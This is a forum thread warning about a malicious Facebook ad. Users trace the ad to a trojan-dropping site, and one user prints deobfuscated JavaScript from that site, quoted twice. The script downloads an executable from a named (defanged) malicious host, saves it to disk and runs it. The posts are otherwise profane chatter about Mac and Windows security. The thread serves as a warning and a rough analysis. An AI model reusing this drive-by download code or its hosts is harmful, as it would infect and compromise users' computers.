Facebook Trojan

Status
Not open for further replies.
TheDean

TheDean

Too Cool for School
Aug 3, 2008
337
8
0
okay some dumb mother fucker just put up an ad on facebook that spreads a trojan.

DO NOT CLICK the following ad if you see it.

trojanadw.jpg


trojanscreenshot.jpg


and the mother fucker redirects to takerealty.com i see the source is ea.widlil.net/handler/allpack.html.
 


His ad sucks for someone trying to spread something like that to the masses. Unless he's purposely targeting iphone app developers. Even so, pretty slick. Respek for creativity! But when FB nabs him, if he's using his real CC he's gonna be fucked.
 
Jon said:
His ad sucks for someone trying to spread something like that to the masses. Unless he's purposely targeting iphone app developers. Even so, pretty slick. Respek for creativity! But when FB nabs him, if he's using his real CC he's gonna be fucked.
Click to expand...

he was definitely not aiming at the masses with this one. i mean like you said the copy couldn't be more perfect to bring in the dev crowd. no way he's using his own CC. as the economy tanks even more i wonder just how much of this we'll see, if it gets crazy, i'm sure verification policies for new advertisers will go into place. No more of this sign up and run it.

barman said:
man facebook will approve a trojan but not some flog landers..... this is an outrage.
Click to expand...

well they are all on macs...
 
Speaking of Kaspersky, anybody else having it continually shut itself down starting tonight? It's not Conficker, but their latest update fucked something up.
 
that ad is pretty weird. you need mac os x to develop iphone apps, and that trojan is only for windows, right?
 
andyt said:
that ad is pretty weird. you need mac os x to develop iphone apps, and that trojan is only for windows, right?
Click to expand...

Macs can get trojans. It got through Internal Facebook and they all use Macs. And it's targeting iPhone App developers, ergo they use Macs as well. So the puzzle is coming together. Deliver a trojan that quietly infects Macs, and start fucking data mining internal Facebook and whoever else clicks.

Kaspersky is pretty robust, the Russians don't fuck around when it comes to virus software apparently. All I have to do is sneeze and this fucker goes on lock down.
 
TheDean said:
Macs can get trojans. It got through Internal Facebook and they all use Macs. And it's targeting iPhone App developers, ergo they use Macs as well. So the puzzle is coming together. Deliver a trojan that quietly infects Macs, and start fucking data mining internal Facebook and whoever else clicks.
Click to expand...

I've seen a mac trojan attempt to infect one of my machines. Without any bullshit antivirus software installed, it will still open an OS X Installer that requires your admin privileges and for you to type your login info in.

There's certainly no secret files being inserted into your machine. It takes a full on "yes please let me get infected" for you to actually acquire the trojan.

They must have just cloaked the fb interns.
 
I just visited the page and its a big ass javascript thats encrypted. I just did a quick decrypt and here is where the magic happens. Def a virus for PC yet targeting mac users. Note the file it attempts to download. I XX'd out the url just in case.

Code: 
function VdAQqREvJk() {
	try{
		var downloadPath = 'c:\\fBrKWbU.exe';
		var obj = XExpCore.getTargetObj('ADODB.Stream');
		if( obj && XExpCore.Shell != null && XExpCore.XmlHttp != null ) {							
			var contentBinary = XExpCore.httpDownload( 'hXXp://ea.widlil.net/download/CADB64A9/160B9C0FE915BF66ED51FC993DF50835/48D2F110-0C0C-433d-AA87-15BBFBD59129' );			
			if( contentBinary != null ) {						
				obj.Type = 1; obj.Mode = 3;
				obj.Open(); obj.Write( contentBinary );
				obj.SaveToFile( downloadPath, 2);
				obj.Close();
				return XExpCore.shellExecute( downloadPath );
			}
		}
	}catch(e) {}
	return false;
}
 
goddfadda said:
I just visited the page and its a big ass javascript thats encrypted. I just did a quick decrypt and here is where the magic happens. Def a virus for PC yet targeting mac users. Note the file it attempts to download. I XX'd out the url just in case.

Code: 
function VdAQqREvJk() {
    try{
        var downloadPath = 'c:\\fBrKWbU.exe';
        var obj = XExpCore.getTargetObj('ADODB.Stream');
        if( obj && XExpCore.Shell != null && XExpCore.XmlHttp != null ) {                            
            var contentBinary = XExpCore.httpDownload( 'hXXp://ea.widlil.net/download/CADB64A9/160B9C0FE915BF66ED51FC993DF50835/48D2F110-0C0C-433d-AA87-15BBFBD59129' );            
            if( contentBinary != null ) {                        
                obj.Type = 1; obj.Mode = 3;
                obj.Open(); obj.Write( contentBinary );
                obj.SaveToFile( downloadPath, 2);
                obj.Close();
                return XExpCore.shellExecute( downloadPath );
            }
        }
    }catch(e) {}
    return false;
}
Click to expand...

+1

i've never owned a mac so really don't know its defenses, thus my stealth comment. so would this get blocked like any other trojan?
 
Well you're totally right a trojan can exist. But yea it cannot magically just install itself like some exploits on older Windows OS's can. Instead it will launch the mac equivalent of an install shield which asks for your user name and password to authenticate to root privs (mac ~= unix). Then it will install like normal.

If you're not a very savvy computer user there's a good chance you'll just type it in without thinking and then sure, it will install.

Of course iphone devs are gonna know better since they're more savvy. So only thing I can think is this was just a really shitty translated russian trojan ad intended for a different user base.
 
Status
Not open for further replies.
Top Bottom